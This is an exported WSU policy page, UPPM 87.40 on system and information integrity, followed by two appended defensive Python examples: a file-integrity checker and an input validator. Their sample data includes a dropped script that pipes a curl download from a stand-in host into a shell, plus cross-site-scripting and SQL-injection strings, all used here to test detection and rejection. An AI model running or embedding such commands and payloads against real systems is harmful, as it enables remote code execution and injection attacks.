{"id":43481,"date":"2020-06-15T09:31:45","date_gmt":"2020-06-15T16:31:45","guid":{"rendered":"https:\/\/policies.wsu.edu\/prf\/?page_id=43481"},"modified":"2026-02-20T16:24:20","modified_gmt":"2026-02-21T00:24:20","slug":"bppm-87-40","status":"publish","type":"page","link":"https:\/\/policies.wsu.edu\/prf\/index\/manuals\/business-policies-and-procedures-manual\/bppm-87-40\/","title":{"rendered":"87.40 System and Information Integrity"},"content":{"rendered":"\n<h1 class=\"wp-block-heading wsu-font-size--xxmedium\">University Policies and Procedures Manual&nbsp;(previously Business Policies and Procedures Manual)<\/h1>\n\n\n\n<h2 class=\"wp-block-heading\">System and Information Integrity<\/h2>\n\n\n<div class=\"wsu-row wsu-row--single\" >\r\n    \n<div class=\"wsu-column\"  style=\"\">\r\n\t\n\n<p><strong>UPPM 87.40<\/strong><\/p>\n<p><strong>For more information contact:<\/strong><br \/>\u00a0 \u00a0<a href=\"https:\/\/its.wsu.edu\/how-can-we-help-contact-its\/\">Information Technology Services<\/a><\/p>\n<hr \/>\n<div id=\"toc_container\">\n<h3>Contents<\/h3>\n<ul class=\"toc_list\">\n<li><a href=\"#One_0\">1.0 \u00a0\u00a0 Overview and Purpose<\/a>\n<ul class=\"toc_list\">\n<li><a href=\"#One_1\">1.1 \u00a0\u00a0 Information Assurance Policies Generally<\/a><\/li>\n<li><a href=\"#One_2\">1.2 \u00a0\u00a0 Specific Policy Overview and Purpose<\/a><\/li>\n<\/ul>\n<\/li>\n<li><a href=\"#Two_0\">2.0 \u00a0\u00a0 Applicability<\/a><\/li>\n<li><a href=\"#Three_0\">3.0 \u00a0\u00a0 Roles and Responsibilities<\/a>\n<ul class=\"toc_list\">\n<li><a href=\"#Three_1\">3.1 \u00a0\u00a0 Chief Information Officer<\/a><\/li>\n<li><a href=\"#Three_2\">3.2 \u00a0\u00a0 Information System Owners<\/a><\/li>\n<li><a href=\"#Three_3\">3.3 \u00a0\u00a0 Office of Information Security and Assurance (OISA)<\/a><\/li>\n<\/ul>\n<\/li>\n<li><a href=\"#Four_0\">4.0 \u00a0\u00a0 Requirements<\/a>\n<ul class=\"toc_list\">\n<li><a href=\"#Four_1\">4.1 \u00a0\u00a0 General 
Requirements<\/a><\/li>\n<li><a href=\"#Four_2\">4.2 \u00a0\u00a0 Moderate- and High-Impact Systems<\/a><\/li>\n<li><a href=\"#Four_3\">4.3 \u00a0\u00a0 High-Impact Systems<\/a><\/li>\n<\/ul>\n<\/li>\n<li><a href=\"#Five_0\">5.0 \u00a0\u00a0 Training<\/a><\/li>\n<\/ul>\n<\/div>\n<h3 id=\"One_0\">1.0 Overview and Purpose<\/h3>\n<h4 id=\"One_1\">1.1 Information Assurance Policies Generally<\/h4>\n<p>The purposes of the information assurance policies in UPPM Chapter 87: Information Technology and Security are to:<\/p>\n<ul>\n<li>Set requirements to ensure the privacy, confidentiality, integrity, and availability of Washington State University (WSU) data;<\/li>\n<li>Support institutional goals and strategies with appropriate methods for administratively, technically, and operationally protecting data; and<\/li>\n<li>Define the criteria WSU follows to meet requirements for protecting data, which are determined by Information Owners.<\/li>\n<\/ul>\n<p>The policies in this chapter comply with Federal Information Processing Standards (<a href=\"https:\/\/nvlpubs.nist.gov\/nistpubs\/fips\/nist.fips.199.pdf\">FIPS 199<\/a>), which are intended to help organizations achieve a common level of quality and interoperability in information technology (IT) by requiring categorization of systems as low-impact, moderate-impact, or high-impact for the stated security objectives of confidentiality, integrity, and availability. 
To determine the potential consequence of a loss event, the Federal Information Processing Standards:<\/p>\n<ul>\n<li>Define WSU Information Owners\u2019 impact categorization rating (Low, Moderate, or High);<\/li>\n<li>Dictate which security controls are mandatory based upon the categorization level;<\/li>\n<li>Define the strength, frequency, and formalization of those controls; and<\/li>\n<li>Influence audit burden and continuous monitoring rigor.<\/li>\n<\/ul>\n<p>See <a href=\"https:\/\/policies.wsu.edu\/prf\/index\/manuals\/business-policies-and-procedures-manual\/bppm-87-01\/\">UPPM 87.01<\/a> for definitions, general information, and violations related to this policy, as well as additional information regarding roles and responsibilities.<\/p>\n<h4 id=\"One_2\">1.2 Specific Policy Overview and Purpose<\/h4>\n<p>Ensuring that WSU\u2019s systems and information are protected helps maintain a secure and reliable IT environment that supports WSU\u2019s academic, research, and administrative missions. 
This policy establishes the requirements to prevent, detect, and correct vulnerabilities across WSU\u2019s systems.<\/p>\n<h3 id=\"Two_0\">2.0 Applicability<\/h3>\n<p>This policy applies to all WSU system users who have contact with, or potentially may have contact with, WSU data, applications, and computing resources.<\/p>\n<p>Security control exceptions to policy statements in UPPM Chapter 87 are managed and maintained in accordance with <a href=\"https:\/\/policies.wsu.edu\/prf\/index\/manuals\/business-policies-and-procedures-manual\/bppm-87-23\/\">UPPM 87.23<\/a>.<\/p>\n<h3 id=\"Three_0\">3.0 Roles and Responsibilities<\/h3>\n<h4 id=\"Three_1\">3.1 Chief Information Officer<\/h4>\n<p>The Chief Information Officer (CIO) of WSU, or designee, is responsible for administering this policy and reviewing it on an annual basis.<\/p>\n<h4 id=\"Three_2\">3.2 Information System Owners<\/h4>\n<p>WSU Information System Owners, or their delegates, are responsible and accountable for developing appropriate Standard Operating Procedures (SOPs) for this policy&#8217;s implementation.<\/p>\n<h4 id=\"Three_3\">3.3 Office of Information Security and Assurance (OISA)<\/h4>\n<p>WSU\u2019s Office of Information Security and Assurance (OISA) shall maintain the <a href=\"https:\/\/its.wsu.edu\/documents\/2026\/01\/system-and-information-integrity-standard.pdf\">standard (PDF)<\/a> associated with this policy and provide guidance for the associated procedures for the implementation of this policy (<a href=\"https:\/\/its.wsu.edu\/documents\/2026\/01\/system-and-information-integrity-procedure.pdf\/\">see examples (PDF)<\/a>).<\/p>\n<p><strong>Note:<\/strong> While all units are required to adhere to the standard established by OISA (<a href=\"https:\/\/csrc.nist.gov\/pubs\/sp\/800\/53\/r5\/upd1\/final\">NIST SP 800-53<\/a>), procedural examples for implementation are optional.<\/p>\n<h3 id=\"Four_0\">4.0 Requirements<\/h3>\n<h4 id=\"Four_1\">4.1 General Requirements<\/h4>\n<p>Prior to 
implementation of information systems, WSU Information System Owners, or their delegates, are required to remediate software and firmware vulnerabilities and flaws. Security-relevant software and firmware updates are to be installed in accordance with <a href=\"https:\/\/policies.wsu.edu\/prf\/index\/manuals\/business-policies-and-procedures-manual\/bppm-87-30\/\">UPPM 87.30<\/a>.<\/p>\n<p>Software updates are to be tested in a non-production environment.<\/p>\n<p>Centrally managed spam protection mechanisms must be employed at information system entry and exit points to detect and act on unsolicited messages.<\/p>\n<p>Malicious code protection mechanisms (security tools) must be employed at information system entry and exit points as well as on system endpoints.<\/p>\n<p>The malicious code and spam protection mechanisms are to be automatically updated whenever new releases are available, in accordance with WSU\u2019s OISA <a href=\"https:\/\/its.wsu.edu\/documents\/2026\/01\/system-and-information-integrity-standard.pdf\">standards (PDF)<\/a>.<\/p>\n<p>Malicious code protection mechanisms must perform periodic scans of information systems and take automated action against any discovered malicious code.<\/p>\n<p>File scanning must be configured to run in real time for files from external sources, as files are downloaded, opened, or executed.<\/p>\n<p>Upon detection of malicious code, the malicious code protection mechanisms must block and\/or quarantine the malicious code and send alerts to the WSU Security Operations Center (SOC).<\/p>\n<p>Information System Owners, or their delegates, must ensure that information systems are monitored to detect:<\/p>\n<ul>\n<li>Attacks;<\/li>\n<li>Indicators of potential attacks; and<\/li>\n<li>Unauthorized use.<\/li>\n<\/ul>\n<p>Information systems are to be monitored continuously 
to provide analysis of alerts and\/or notifications generated by institutional information systems.<\/p>\n<p>The level of information system monitoring is to be heightened when there is an indication of increased risk to operations, assets, and\/or individuals.<\/p>\n<p>Business units are to receive system security alerts, advisories, and directives on an ongoing basis:<\/p>\n<ul>\n<li>Internal security alerts, advisories, and directives are to be generated and disseminated as necessary.<\/li>\n<li>Security alerts, advisories, and directives are to be implemented in accordance with WSU\u2019s OISA <a href=\"https:\/\/its.wsu.edu\/documents\/2026\/01\/system-and-information-integrity-standard.pdf\">standards (PDF)<\/a>.<\/li>\n<\/ul>\n<p>Business units are to ensure that applicable internal security alerts, advisories, and directives are disseminated to institutional Area Technology Officers (ATOs), Information System Owners, and other business unit personnel as needed.<\/p>\n<p>Business units must maintain a list of authorized business information systems and software. The list is to be protected to prevent loss of integrity.<\/p>\n<p>WSU personnel are to be alerted to failed security and privacy verification tests and when anomalies are discovered.<\/p>\n<p>WSU developers must ensure error messages generated by the information system provide the information necessary for corrective action without revealing information that could be exploited by adversaries.<\/p>\n<h4 id=\"Four_2\">4.2 Moderate- and High-Impact Systems<\/h4>\n<p>In addition to the above, the following requirements apply to all moderate- and high-impact systems.<\/p>\n<p>Moderate- and high-impact systems must use automated mechanisms 
to determine if system components have applicable security-relevant software and firmware updates installed.<\/p>\n<p>Moderate- and high-impact systems must define and implement controls to protect system memory from unauthorized code execution.<\/p>\n<p>Moderate- and high-impact systems must employ automated tools and mechanisms to support analysis of events.<\/p>\n<p>Moderate- and high-impact systems must define criteria for unusual or unauthorized activities or conditions and monitor inbound and outbound communications traffic against those criteria.<\/p>\n<ul>\n<li>Alerts must notify relevant personnel when indications of compromise or potential compromise occur.<\/li>\n<\/ul>\n<p>Moderate- and high-impact systems must use integrity verification tools to detect unauthorized changes to software, firmware, and information.<\/p>\n<ul>\n<li>Response actions must occur when unauthorized changes to software, firmware, and information are detected.<\/li>\n<li>Integrity checks are to be performed during system startup, restart, and shutdown.<\/li>\n<li>Detection of unauthorized changes to authorized business systems and software is to be processed in accordance with <a href=\"https:\/\/policies.wsu.edu\/prf\/index\/manuals\/business-policies-and-procedures-manual\/bppm-87-55\/\">UPPM 87.55<\/a>.<\/li>\n<\/ul>\n<p>Moderate- and high-impact systems must implement cryptographic authentication mechanisms to verify the integrity of software or firmware components.<\/p>\n<p>Moderate- and high-impact systems must validate the syntax and semantics of system inputs to prevent cyberattacks, such as cross-site scripting and a variety of injection attacks.<\/p>\n<h4 id=\"Four_3\">4.3 High-Impact Systems<\/h4>\n<p>In addition to the above, the following requirements apply to all high-impact 
systems.<\/p>\n<p>High-impact systems must consider enabling provisions to ensure encrypted communications are visible to WSU monitoring tools and mechanisms.<\/p>\n<p>High-impact systems must automatically alert personnel when indications of inappropriate or unusual activities occur, as defined in <a href=\"https:\/\/policies.wsu.edu\/prf\/index\/manuals\/business-policies-and-procedures-manual\/bppm-87-50\/\">UPPM 87.50<\/a>.<\/p>\n<p>High-impact systems must regularly verify the correct operation of security and privacy functions during system transitional states and upon command by a user with appropriate privilege.<\/p>\n<p>High-impact systems must employ automated tools to notify relevant personnel upon discovering discrepancies during integrity verification.<\/p>\n<p>When integrity violations are discovered, high-impact systems are to be configured to automatically shut down, restart, and\/or trigger an audit alert.<\/p>\n<h3 id=\"Five_0\">5.0 Training<\/h3>\n<p>See <a href=\"https:\/\/policies.wsu.edu\/prf\/index\/manuals\/business-policies-and-procedures-manual\/bppm-87-21\/\">UPPM 87.21<\/a> for training requirements related to UPPM Chapter 87.<\/p>\n<p>In addition to the requirements in <a href=\"https:\/\/policies.wsu.edu\/prf\/index\/manuals\/business-policies-and-procedures-manual\/bppm-87-21\/\">UPPM 87.21<\/a>, Information System Owners are responsible for ensuring that users receive appropriate information security and privacy training commensurate with their roles, responsibilities, and authorized access to information systems under the Information System Owner\u2019s authority.<\/p>\n<p style=\"font-size: .8rem\">_______________________<br \/><strong>Revisions:<\/strong>\u00a0 Feb. 2026 (Rev. <a href=\"https:\/\/policies.wsu.edu\/prf\/bppm-manual-revisions\/bppm-revision-651\/\">651<\/a>); July 2020 &#8211; new policy (Rev. 
<a href=\"https:\/\/policies.wsu.edu\/prf\/bppm-manual-revisions\/bppm-revision-552\/\">552<\/a>)<\/p>\n\n<\/div>\r\n\n<\/div>","protected":false},"excerpt":{"rendered":"<p>University Policies and Procedures Manual&nbsp;(previously Business Policies and Procedures Manual) System and Information Integrity<\/p>\n","protected":false},"author":1061,"featured_media":0,"parent":50633,"menu_order":0,"comment_status":"closed","ping_status":"closed","template":"","meta":[],"wsuwp_university_location":[],"wsuwp_university_org":[],"_links":{"self":[{"href":"https:\/\/policies.wsu.edu\/prf\/wp-json\/wp\/v2\/pages\/43481"}],"collection":[{"href":"https:\/\/policies.wsu.edu\/prf\/wp-json\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/policies.wsu.edu\/prf\/wp-json\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/policies.wsu.edu\/prf\/wp-json\/wp\/v2\/users\/1061"}],"replies":[{"embeddable":true,"href":"https:\/\/policies.wsu.edu\/prf\/wp-json\/wp\/v2\/comments?post=43481"}],"version-history":[{"count":25,"href":"https:\/\/policies.wsu.edu\/prf\/wp-json\/wp\/v2\/pages\/43481\/revisions"}],"predecessor-version":[{"id":69990,"href":"https:\/\/policies.wsu.edu\/prf\/wp-json\/wp\/v2\/pages\/43481\/revisions\/69990"}],"up":[{"embeddable":true,"href":"https:\/\/policies.wsu.edu\/prf\/wp-json\/wp\/v2\/pages\/50633"}],"wp:attachment":[{"href":"https:\/\/policies.wsu.edu\/prf\/wp-json\/wp\/v2\/media?parent=43481"}],"wp:term":[{"taxonomy":"wsuwp_university_location","embeddable":true,"href":"https:\/\/policies.wsu.edu\/prf\/wp-json\/wp\/v2\/wsuwp_university_location?post=43481"},{"taxonomy":"wsuwp_university_org","embeddable":true,"href":"https:\/\/policies.wsu.edu\/prf\/wp-json\/wp\/v2\/wsuwp_university_org?post=43481"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}
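Section 4.2 requires integrity verification tools that detect unauthorized changes to software, firmware and information, and cryptographic authentication of the components being verified; section 4.1 separately requires that the list of authorized software be protected against loss of integrity. The following is an added example, not WSU's or OISA's code, of how those three requirements fit together in one checker: a baseline manifest of SHA-256 digests is itself authenticated with HMAC-SHA256, so a manifest an intruder edits to hide a modified file is rejected before any comparison happens. The key, file paths, file contents and the "later snapshot" are constructed sample data; the `snapshot_directory` helper is the hook a real deployment would use instead of the in-memory dictionaries.

```python
"""Added example (not WSU's code): HMAC-authenticated file-integrity baseline.

Models the UPPM 87.40 4.2 requirements for integrity verification tools and
cryptographic authentication of software components. The baseline manifest
(path -> SHA-256) is itself authenticated with HMAC-SHA256, so a tampered
manifest is rejected rather than trusted. The in-memory 'filesystem'
dictionaries below are constructed sample data; the key is a placeholder.
"""
import hashlib
import hmac
import json
import pathlib
from typing import Dict, List

# Placeholder key for the example only. In practice load it from a secret
# store; never keep it on the filesystem the manifest is supposed to protect.
BASELINE_KEY = b"example-manifest-key-change-me"


def sha256_hex(data: bytes) -> str:
    return hashlib.sha256(data).hexdigest()


def snapshot_directory(root: str) -> Dict[str, bytes]:
    """Read every regular file under root into the path -> bytes shape used below."""
    base = pathlib.Path(root)
    return {str(p): p.read_bytes() for p in sorted(base.rglob("*")) if p.is_file()}


def build_manifest(files: Dict[str, bytes]) -> Dict[str, str]:
    """Baseline: one SHA-256 digest per protected path."""
    return {path: sha256_hex(content) for path, content in sorted(files.items())}


def canonical(manifest: Dict[str, str]) -> bytes:
    # Sorted keys and fixed separators make the authenticated bytes deterministic.
    return json.dumps(manifest, sort_keys=True, separators=(",", ":")).encode()


def sign_manifest(manifest: Dict[str, str], key: bytes) -> str:
    return hmac.new(key, canonical(manifest), hashlib.sha256).hexdigest()


def verify_manifest(manifest: Dict[str, str], tag: str, key: bytes) -> bool:
    # Constant-time comparison avoids leaking how many tag bytes matched.
    return hmac.compare_digest(sign_manifest(manifest, key), tag)


def diff_against_baseline(files: Dict[str, bytes], manifest: Dict[str, str]) -> Dict[str, List[str]]:
    """Classify every deviation from the baseline: changed, missing, unexpected."""
    modified = [p for p, d in manifest.items() if p in files and sha256_hex(files[p]) != d]
    removed = [p for p in manifest if p not in files]
    added = [p for p in files if p not in manifest]
    return {"modified": sorted(modified), "removed": sorted(removed), "added": sorted(added)}


def run_integrity_check(files: Dict[str, bytes], manifest: Dict[str, str],
                        tag: str, key: bytes) -> Dict[str, object]:
    """Refuse to compare against a manifest whose HMAC does not verify.

    'status' is one of 'manifest_rejected', 'clean' or 'violation' so the
    caller can take the policy's response action (alert the SOC, quarantine,
    restart) without re-deriving the decision.
    """
    if not verify_manifest(manifest, tag, key):
        return {"status": "manifest_rejected", "findings": {}}
    findings = diff_against_baseline(files, manifest)
    return {"status": "violation" if any(findings.values()) else "clean", "findings": findings}


# --- constructed sample data (not real binaries or paths) ---------------------
BASELINE_FILES = {
    "/opt/app/bin/service": b"\x7fELF...original-binary",
    "/opt/app/etc/app.conf": b"listen=127.0.0.1:8443\n",
    "/opt/app/lib/helper.so": b"\x7fELF...helper",
}
MANIFEST = build_manifest(BASELINE_FILES)
TAG = sign_manifest(MANIFEST, BASELINE_KEY)

# Later snapshot: config edited, helper removed, a new file dropped in.
CURRENT_FILES = {
    "/opt/app/bin/service": b"\x7fELF...original-binary",
    "/opt/app/etc/app.conf": b"listen=0.0.0.0:8443\n",
    "/opt/app/bin/.cache": b"#!/bin/sh\ncurl http://example.invalid | sh\n",
}


def demo():
    result = run_integrity_check(CURRENT_FILES, MANIFEST, TAG, BASELINE_KEY)
    # An intruder who rewrites the manifest entry for the edited config but
    # lacks the key produces a manifest the checker refuses to use at all.
    forged = {**MANIFEST, "/opt/app/etc/app.conf": sha256_hex(CURRENT_FILES["/opt/app/etc/app.conf"])}
    forged_result = run_integrity_check(CURRENT_FILES, forged, TAG, BASELINE_KEY)
    return result, forged_result


if __name__ == "__main__":
    for r in demo():
        print(json.dumps(r, indent=2))
```

Running the check at startup, restart and shutdown, as 4.2 asks, is a matter of calling `run_integrity_check` from the service's lifecycle hooks and routing a `violation` or `manifest_rejected` status to the SOC alerting path; the HMAC tag should be regenerated (with the key kept off the host) whenever an authorized change is deployed.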
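Section 4.2 requires validating both the syntax and the semantics of system inputs, and section 4.1 requires error messages that support corrective action without giving an adversary exploitable detail. The following is an added example, not WSU's or OISA's code, that shows the two validation stages as separate steps and an error path that keeps the detail in the log under a correlation reference. The firewall-request form, the NetID and hostname rules, the delegated-zone table and the sample inputs are all constructed for the example; a real application takes its field rules from its own data model.

```python
"""Added example (not WSU's code): two-stage input validation with safe
error reporting, after UPPM 87.40 4.1 (error messages) and 4.2 (syntax and
semantics of inputs). Field rules, the DELEGATED_ZONES table and the sample
requests are constructed for illustration.
"""
import logging
import re
import uuid
from dataclasses import dataclass
from typing import Dict, Tuple

log = logging.getLogger("app.validation")

# Syntax is checked with allowlists, not denylists. A NetID here is 2-16
# lowercase alphanumerics; hostnames follow the RFC 1123 label shape.
NETID_RE = re.compile(r"^[a-z][a-z0-9]{1,15}$")
HOSTNAME_RE = re.compile(
    r"^(?=.{1,253}$)([a-z0-9](?:[a-z0-9-]{0,61}[a-z0-9])?\.)*[a-z0-9](?:[a-z0-9-]{0,61}[a-z0-9])?$")


@dataclass(frozen=True)
class FirewallRequest:
    netid: str
    host: str
    port: int
    justification: str


class ValidationError(ValueError):
    """Carries a user-safe message; internal detail goes to the log instead."""


def validate_syntax(raw: Dict[str, str]) -> FirewallRequest:
    """Stage 1: every field must match an allowed shape or the request is refused."""
    netid = raw.get("netid", "")
    if not NETID_RE.fullmatch(netid):
        raise ValidationError("netid: must be 2-16 lowercase letters or digits")
    host = raw.get("host", "").lower()
    if not HOSTNAME_RE.fullmatch(host):
        raise ValidationError("host: not a valid hostname")
    try:
        port = int(raw.get("port", ""), 10)
    except ValueError:
        raise ValidationError("port: must be an integer") from None
    if not 1 <= port <= 65535:
        raise ValidationError("port: out of range")
    justification = raw.get("justification", "")
    # A length bound plus printable-only and no '<' keeps control characters
    # and script tags out of any log line or HTML template downstream.
    if not 1 <= len(justification) <= 200 or not justification.isprintable() or "<" in justification:
        raise ValidationError("justification: 1-200 printable characters, no '<'")
    return FirewallRequest(netid, host, port, justification)


# Constructed authorization data: which DNS zones each NetID may request
# rules for, and which inbound ports are ever approved.
DELEGATED_ZONES = {"ab123": ("lab.example.edu",), "cd456": ("web.example.edu",)}
ALLOWED_PORTS = {22, 443, 8443}


def validate_semantics(req: FirewallRequest) -> FirewallRequest:
    """Stage 2: well-formed values must also make sense for this requester."""
    zones = DELEGATED_ZONES.get(req.netid, ())
    if not any(req.host == z or req.host.endswith("." + z) for z in zones):
        raise ValidationError("host: not within a zone delegated to you")
    if req.port not in ALLOWED_PORTS:
        raise ValidationError("port: not an approved inbound service port")
    return req


def handle_request(raw: Dict[str, str]) -> Tuple[int, Dict[str, str]]:
    """Map outcomes to responses the way an HTTP handler would.

    The client learns which field failed and why in user terms. Exception
    text, stack traces, paths and internal names stay in the log, keyed by a
    reference the client can quote when asking for help.
    """
    ref = uuid.uuid4().hex[:12]
    try:
        req = validate_semantics(validate_syntax(raw))
    except ValidationError as e:
        log.info("request %s rejected: %s input=%r", ref, e, raw)
        return 400, {"error": str(e), "ref": ref}
    except Exception:  # unexpected failure: never echo the exception to the client
        log.exception("request %s failed", ref)
        return 500, {"error": "internal error; quote the reference when reporting", "ref": ref}
    return 200, {"status": "accepted", "rule": f"{req.host}:{req.port}", "ref": ref}


# Constructed sample inputs: valid; script payload; out-of-scope host; SQL-shaped NetID.
SAMPLES = [
    {"netid": "ab123", "host": "build01.lab.example.edu", "port": "22", "justification": "CI runner"},
    {"netid": "ab123", "host": "x.lab.example.edu", "port": "22", "justification": "<script>alert(1)</script>"},
    {"netid": "ab123", "host": "db01.web.example.edu", "port": "443", "justification": "needs access"},
    {"netid": "ab123'; DROP TABLE rules;--", "host": "a.lab.example.edu", "port": "22", "justification": "x"},
]

if __name__ == "__main__":
    logging.basicConfig(level=logging.INFO)
    for s in SAMPLES:
        print(handle_request(s))
```

The split matters in practice: the third sample passes every syntax rule and would be accepted by a validator that only checks shapes, yet it asks for a rule in a zone the requester does not own. Note also that the rejected input is written to the log in full (where analysts need it) but never echoed back in the 400 body.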